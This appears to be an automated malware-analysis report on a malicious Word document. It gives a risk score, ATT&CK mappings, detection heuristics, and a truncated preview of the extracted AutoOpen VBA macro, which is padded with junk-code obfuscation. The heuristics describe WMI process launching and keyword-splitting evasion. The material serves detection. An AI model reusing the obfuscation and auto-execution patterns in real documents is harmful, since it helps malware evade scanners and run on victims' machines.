MALICIOUS
342
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample contains a VBA macro with an autoopen subroutine, which is a common technique for executing malicious code upon opening a document. The macro utilizes GetObject and CreateObject to launch the 'Win32_Process' WMI class, specifically calling the 'Create' method. This indicates an attempt to execute arbitrary commands or launch other malicious processes. The obfuscation of 'winmgmts' by splitting string literals further suggests malicious intent.
Heuristics 9
-
ClamAV: Doc.Malware.00536d-6943632-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6943632-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29919 bytes |
SHA-256: 5fbb47236ae0f54e833181206c69db291fc3c7461639b8b6aae16dd098abaab8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "MG1AX1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "axoZwZ"
Attribute VB_Base = "0{C048E48B-2750-47EE-AD27-3D21AD99F581}{AC90A0B1-A6E9-49BA-ADE5-D67CF5FB9B4A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "JCZXQ4"
Attribute VB_Base = "0{8645C7D1-CB6E-4A8B-A8B4-B0066A491CFC}{C6B5E892-E6D6-42AD-9367-30CF0C3F8CBA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "ow4UCA"
Sub autoopen()
If NAc4AwAD = wAUGAA Then
Select Case GQAAAwA
Case 167068954
CQkQUU = Rnd(RABDBw + 650495095 + 371117463 / wDQ1AAQA)
zA1AA1Ax = CByte(rAUAUDo + 20487845 + fA1UXUDA + 505403680)
Case 387900406
T1k4Z1C = hXQAAc
uoQQDUA = Tan(D_A1ZQUA - CSng(zDBBDA))
End Select
End If
If j_BBBAQ = aA_DAk Then
Select Case EAwAXBQG
Case 5402959
zBAw4AAA = Rnd(WZDxCQQA + 676616036 + 512829881 / tZo4AA4)
sDUAX_ = CByte(XDADBAwo + 138834269 + zCAAUD + 958147293)
Case 571616047
UAABABAA = EBowkDZA
mkX1DwQA = Tan(Lo4BAA4Q - CSng(pwDZwA))
End Select
End If
X14_BU1
If BAZXBccA = nAQDAwA Then
Select Case CAAUDx
Case 943859877
XCwUAxkZ = Rnd(KAAkBw + 544252862 + 395633711 / TXAUAc)
aAAA4wD = CByte(CxQwkB + 155554610 + uw4XQAAk + 356396423)
Case 238531479
wDAQcwx = vAxCZUcx
FDBDDxA = Tan(Y_okkQD - CSng(jADAAA))
End Select
End If
If uCBGA4Q = ADAUAoXA Then
Select Case JAAAkDo
Case 483674180
I4wAwAAx = Rnd(LQABQA + 891862522 + 573333373 / pkCQZA)
m1XkAU4U = CByte(aAUXAQA + 661755591 + Zc_1cZ + 94742458)
Case 52062674
o_AZ1ZB = lcDcQA
jBA1BA = Tan(nAoAA4 - CSng(Z4ABwoAG))
End Select
End If
End Sub
Attribute VB_Name = "SkcCADX"
Function X14_BU1()
On Error Resume Next
If tZXkXA = uACBZGB Then
Select Case R4xADQ
Case 199961955
N_ZZAA = Rnd(wB44BZ + 892411673 + 494534649 / m4UUDXk_)
ZQAc4XA = CByte(UBAcAU + 5806753 + nDkAwA_ + 888489361)
Case 284077123
RUAZA4 = jcUAGU
kA1UDCAU = Tan(IQGQUo - CSng(nxUQBB))
End Select
End If
If uAZAoAo = j4XQcwx Then
Select Case j1XBc1Q
Case 584221840
LXBAGA = Rnd(so_BxC + 418538847 + 791559013 / TXXU4A)
LAAw_1 = CByte(DkBQZ_UA + 163227692 + p1wAXkZX + 675427222)
Case 980059429
fDQBw4A = w1o1CU
ZxwB1CBc = Tan(FCDXAw - CSng(lcA_QQ))
End Select
End If
If FADZwZ = KQBAocxA Then
Select Case OkDkUDx
Case 906361846
UA1BUx = Rnd(PcoA_oA + 585722260 + 185414287 / tQoAkAD)
RcZAA1UB = CByte(vBQAAA + 494558293 + XUAA4BAA + 498426341)
Case 314639635
QA_A1Z = I_XkAZ
uAA44A = Tan(bDoQAAA - CSng(w4QDBA))
End Select
End If
If 7926 < 83936 Then
PGGUUxA = vbFalse
If MoCoXAGo = rAUAwU Then
Select Case MoQBGA_
Case 599929272
wDA1_DDB = Rnd(VAQ11AD + 710572197 + 341868934 / hkxUACU)
V4AACZ = CByte(JDUGGcX + 824028117 + doQAAAD + 295595727)
Case 957124950
hUCDxxA = SQABQc4U
soUAAA = Tan(RZBABQC - CSng(W1ACDAAA))
End Select
End If
If VAZAUB = S1XQAAo Then
Select Case qBCBAoAA
Case 733598475
JAwxAAx = Rnd(VxQcA
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.